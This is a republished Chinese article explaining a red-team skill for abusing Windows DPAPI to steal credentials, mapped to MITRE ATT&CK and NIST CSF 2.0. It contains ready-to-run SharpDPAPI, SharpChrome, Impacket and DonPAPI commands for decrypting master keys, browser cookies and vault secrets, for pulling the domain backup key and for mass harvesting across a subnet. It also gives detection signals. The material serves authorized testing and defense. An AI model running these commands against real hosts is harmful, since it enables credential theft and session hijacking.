尧图网站设计 尧图网站设计YAOTU DESIGN
ARTICLE DETAIL

资讯详情

深耕网站设计与一线实操的经验洞察。

Anthropic-Cybersecurity-Skills 中的 DPAPI 凭据访问:MITRE ATTCK 与 NIST CSF 2.0 标准映射实战解读

Anthropic-Cybersecurity-Skills 中的 DPAPI 凭据访问:MITRE ATTCK 与 NIST CSF 2.0 标准映射实战解读 Anthropic-Cybersecurity-Skills 中的 DPAPI 凭据访问MITRE ATTCK 与 NIST CSF 2.0 标准映射实战解读【免费下载链接】Anthropic-Cybersecurity-Skills817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATTCK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI 20 platforms · 29 security domains · Apache 2.0项目地址: https://gitcode.com/GitHub_Trending/an/Anthropic-Cybersecurity-Skills本文以 Abusing DPAPI for Credential Access 技能包及其标准映射文档 standards.md 为骨架系统梳理 Windows DPAPI 凭据窃取技术在MITRE ATTCK、NIST CSF 2.0等框架中的定位并结合仓库内完整的操作工作流、命令参考与自动化脚本源码帮助红队从业者与防御分析师在授权攻防场景下既能打得准也能看得清对应的检测面。一、为什么 DPAPI 攻击需要框架映射Windows Data Protection APIDPAPI是操作系统内置的对称加密服务负责保护多种落盘机密RDP 与 Windows 凭据管理器保存的凭据、凭据 Vault 中的 Web/Wi-Fi 密码、Chrome/Edge 浏览器登录态与 Cookie、KeePass 主密钥、证书私钥以及计划任务密码。DPAPI 以用户密码或机器账户机密派生主密钥master key再由主密钥加密各个 DPAPI blob。用户主密钥位于%APPDATA%\Microsoft\Protect\SID\机器主密钥位于%WINDIR%\System32\Microsoft\Protect\。在 standards.md 中该技能被明确锚定到两大权威框架其价值在于威胁知情的防御Threat-Informed Defense按 ATTCK 技术 ID 组织技能便于防守方对照真实对手行为优先级补强监控Agent 驱动的自动发现AI Agent 可通过技术 ID如 T1555.004直接检索对应技能并执行安全工作流这与仓库 index.json 中 817 个技能的标准化描述机制一脉相承紫队演练对齐将进攻性技能本文与防守性检测技能配对验证对 DPAPI 主密钥访问、LSASS/Protect 目录读取的告警有效性。二、NIST CSF 2.0 映射检测面的落地依据ID名称设计理由RationaleDE.CM-01监控网络与网络服务以发现潜在不利事件DPAPI 滥用会生成可检测信号向 DC 发起的 MS-BKRP 备份密钥 RPC、对 Protect/Credentials 文件夹的访问、LSASS 访问监控必须能浮出这些信号DE.CM-01是本文档在 NIST CSF 2.0 Detect检测 功能下唯一的控制项也是该技能在 SKILL.md frontmatter 中声明的nist_csf字段值。它的落地要点是信号清单备份密钥拉取backupkey会触发到域控的 MS-BKRP RPC、\Microsoft\Protect\与\Microsoft\Credentials\目录的异常访问、以及针对 LSASS 的进程访问。防御侧应围绕这三类信号建立告警详见下文检测与 OPSEC 要点。三、MITRE ATTCK 映射三类子技术与一条主战术线技术 ID名称战术设计理由T1555.004Credentials from Password Stores: Windows Credential Manager凭据访问Credential AccessDPAPI 保护 Credential Manager/Vault 条目解密主密钥与 blob 可恢复其中存储的凭据T1555.003Credentials from Password Stores: Credentials from Web Browsers凭据访问SharpChrome 可解密 DPAPI 保护的浏览器登录态与 CookieT1003OS Credential Dumping凭据访问提取主密钥与域备份密钥属于典型的凭据材料倾倒三条映射全部落在TA0006 Credential Access战术下其中 T1555.004 是核心锚点SKILL.md frontmatter 的mitre_attack字段T1555.003 与 T1003 作为并行子路径补充覆盖。这种一主两辅的映射结构与仓库 mappings/mitre-attack/README.md 中技术映射T1xxx 子技术映射T1xxx.xxx的方法论一致——先定位大技术再用子技术提升精度便于防守方精确缩小日志检索范围。四、支撑性框架与标准MS-BKRP / MS-DPSP / D3FENDMS-BKRPBackupKey Remote Protocol用于获取域 DPAPI 备份密钥的 RPC 接口。攻击方通过backupkey命令触发一次到域控的 RPC 调用即可把域备份私钥拉回本地这是域级解密路径的关键协议基础。MS-DPSP / DPAPI微软的数据保护 API 规范统辖主密钥派生与 blob 保护结构是所有离线解密实现Mimikatz、SharpDPAPI、Impacket dpapi.py的底层依据。D3FEND本文档将Credential Eviction凭据清除与Password Rotation密码轮换作为 DPAPI 被攻破后的缓解措施。对应到具体运营动作回收被泄露的凭据、轮换相关账号密码并将旧主密钥作废。五、三条解密路径与完整操作工作流SKILL.md 将攻击路径归纳为三种标准映射文档中的所有技术 ID 都对应其中至少一条路径在线/上下文路径对应 T1555.004 在线利用以目标用户身份运行时DPAPI APICryptUnprotectData透明解密用户 blob对应 SharpDPAPI 的/unprotect标志离线口令/NTLM 哈希路径对应 T1003 材料倾倒用/password:或/ntlm:解密主密钥后离线解密 blob适合处理从主机拖回的取证材料域级备份密钥路径对应 MS-BKRP域管一次性提取域 RSA DPAPI 备份密钥.pvk即可永久解密任意域用户主密钥在线/离线均可。5.1 主机 triage对应 T1555.004 的枚举面# 当前用户上下文在线 triage使用 CryptUnprotectData SharpDPAPI.exe triage /unprotect # 机器级 triage需要本地管理员 / SYSTEM SharpDPAPI.exe machinetriage5.2 离线解密用户主密钥# 用明文密码解密当前/指定用户的全部主密钥 SharpDPAPI.exe masterkeys /password:CorrectHorseBatteryStaple # 用 NTLM 哈希代替密码 SharpDPAPI.exe masterkeys /ntlm:cc36cf7a8514893efccd332446158b1a # 输出为 GUID:SHA1 行——后续喂给 credentials/vaults 等命令复用5.3 恢复凭据管理器与 Vault 机密# 用 GUID:SHA1 主密钥映射解密 Credential Manager blob SharpDPAPI.exe credentials {GUID1}:SHA1 {GUID2}:SHA1 # 或直接指向目标 Credentials 目录用域备份密钥解密 SharpDPAPI.exe credentials /target:C:\Users\bob\AppData\Local\Microsoft\Credentials\ /pvk:backupkey.pvk # 解密凭据 Vault 条目 SharpDPAPI.exe vaults /pvk:backupkey.pvk5.4 RDP、KeePass 与证书私钥T1555.004 的扩展面# 保存的 RDCMan.settings RDP 密码 SharpDPAPI.exe rdg /unprotect # KeePass DPAPI 保护的主密钥 SharpDPAPI.exe keepass /unprotect # 证书私钥/showall 导出全部存储的可用 .pem SharpDPAPI.exe certificates /unprotect /showall5.5 SharpChrome 提取浏览器凭据对应 T1555.003# 解密当前用户保存的登录态 SharpChrome.exe logins /unprotect # 解密目标文件夹 Cookie可用于会话劫持 SharpChrome.exe cookies /target:C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies /pvk:backupkey.pvk # 显式解析 AES 应用绑定 state key SharpChrome.exe statekeys /unprotect现代 Chromium 使用应用绑定的 state keySharpChrome 需经 DPAPI 解析该 key 后才能继续解密 login/cookie 数据。5.6 获取域 DPAPI 备份密钥域管权限对应 MS-BKRP# 通过 MS-BKRP RPC 接口拉取域备份密钥并保存为 .pvk SharpDPAPI.exe backupkey /server:dc01.corp.local /file:backupkey.pvk # 用该 .pvk 离线解密任意用户主密钥 SharpDPAPI.exe masterkeys /pvk:backupkey.pvk /target:C:\Users\alice\AppData\Roaming\Microsoft\Protect\5.7 Linux 侧远程/离线 triageImpacket / DonPAPI# 用域备份密钥解密单个主密钥文件 impacket-dpapi masterkey -file masterkey_file -pvk backupkey.pvk # 用解密出的主密钥解密凭据 blob impacket-dpapi credential -file cred_blob -key 0xdecrypted_masterkey # DonPAPI 跨主机批量远程收割 donpapi collect -u alice -p Password123! -d corp.local --target 10.0.0.0/24六、命令参考全景与标准映射的技术支撑点api-reference.md 给出了与上述路径一一对应的完整命令面此处摘其与标准映射强相关的要点命令用途对应技术triage/machinetriage自动执行 credentials/vaults/rdg/certificates 全量枚举T1555.004 / T1003masterkeys解密用户主密钥GUID:SHA1 输出T1003credentials/vaults解密凭据管理器与 Vault 条目T1555.004backupkey经 MS-BKRP 拉取域备份密钥MS-BKRPSharpChromelogins/cookies/statekeys解密浏览器登录态/Cookie/state keyT1555.003impacket-dpapi backupkeys从域控远程取备份密钥MS-BKRP常用标志速查/unprotect在线CryptUnprotectData、/password:明文密码、/ntlm:NTLM 哈希、/pvk:域备份私钥、/mkfile:指定主密钥文件、/server:备份密钥目标 DC、/target:目标文件/目录、/rpc经 RPC 请求 DC 解密主密钥、/showall显示全部证书存储。七、自动化编排源码印证脚本如何驱动上述工具仓库提供的 scripts/agent.py 是一个操作者辅助编排器——它不重新实现 DPAPI 密码学而是构建并驱动真实工具命令、解析其输出。从源码结构看它恰好印证了标准映射中的三类信号面与三条路径工件定位enumerate_artifacts()按AppData\Roaming\Microsoft\Protect用户主密钥、AppData\Local\Microsoft\Credentials凭据管理器 blob、AppData\Local|Roaming\Microsoft\Vault凭据 Vault三个标准相对路径递归枚举这正是 DE.CM-01 中Protect/Credentials 文件夹访问信号对应的攻击侧行为agent.py三路径参数选择sharpdpapi_triage()按优先级拼接/pvk:→/password:→/ntlm:→/unprotect与 SKILL.md 的三条解密路径一一对应agent.pyLinux 侧驱动decrypt_masterkey_impacket()生成impacket-dpapi masterkey -file mk -pvk pvk对应标准中的离线域备份密钥路径agent.py。脚本通过--mode enumerate|impacket|sharpdpapi三种模式覆盖先枚举、再解密的完整流程并在开头强制输出授权提示Authorized use only. Confirm rules-of-engagement before proceeding.呼应 SKILL.md 顶部的法律声明。八、检测与 OPSEC 要点回扣 DE.CM-01主密钥访问及对\Microsoft\Protect\、\Microsoft\Credentials\的读取可被检测backupkey会触发一次到域控的MS-BKRP RPC 调用对应 DE.CM-01 中MS-BKRP backup-key RPC to the DC信号。/unprotect在线路径是单主机场景下最隐蔽的选项但仅能作用于当前存活用户上下文。防守方应监控Sysmon 对 LSASS 的进程访问、对 Protect/Credentials 目录的异常访问DE.CM-01 的落地实现。D3FEND 侧则建议事后执行凭据清除与密码轮换。九、官方资源与进一步阅读资源用途SharpDPAPI / SharpChromeGhostPackWindows 侧 DPAPI triage/解密C#Mimikatz原始 DPAPIdpapi::*实现Impacket dpapi.pyLinux 侧远程/离线解密PythonDonPAPI跨主机批量 DPAPI 收割HackTricks DPAPI技术细节参考仓库内部可继续查阅SKILL.md完整操作工作流与验证清单、api-reference.md命令全表、agent.py自动化编排实现、index.json技能元数据、mappings/mitre-attack/README.md仓库级 ATTCK 映射方法论。十、授权边界与验证标准本技能仅限授权渗透测试、红队演练与教学环境使用。对不拥有或未经明确书面授权的主机提取凭据属违法行为务必在签署的 rules-of-engagement 范围内操作并记录每一步动作。完成一次 DPAPI 攻击演练后应逐项核对验证清单主机是否经triage/machinetriage完成枚举主密钥是否经/unprotect、/password:、/ntlm:或/pvk:解密凭据管理器与 Vault 机密是否恢复RDP/KeePass/证书密钥是否提取浏览器登录态与 Cookie 是否经 SharpChrome 解密域备份密钥若在范围内是否获取并可离线复用所有恢复的机密是否连同来源主机/用户一并记录并确认符合 ROE。完成清单核对后回到标准映射本身将演练中实际触发的事件与 DE.CM-01 的三类信号逐一比对即可把一次攻击演练转化为可落地的检测规则改进输入。【免费下载链接】Anthropic-Cybersecurity-Skills817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATTCK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI 20 platforms · 29 security domains · Apache 2.0项目地址: https://gitcode.com/GitHub_Trending/an/Anthropic-Cybersecurity-Skills创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
返回列表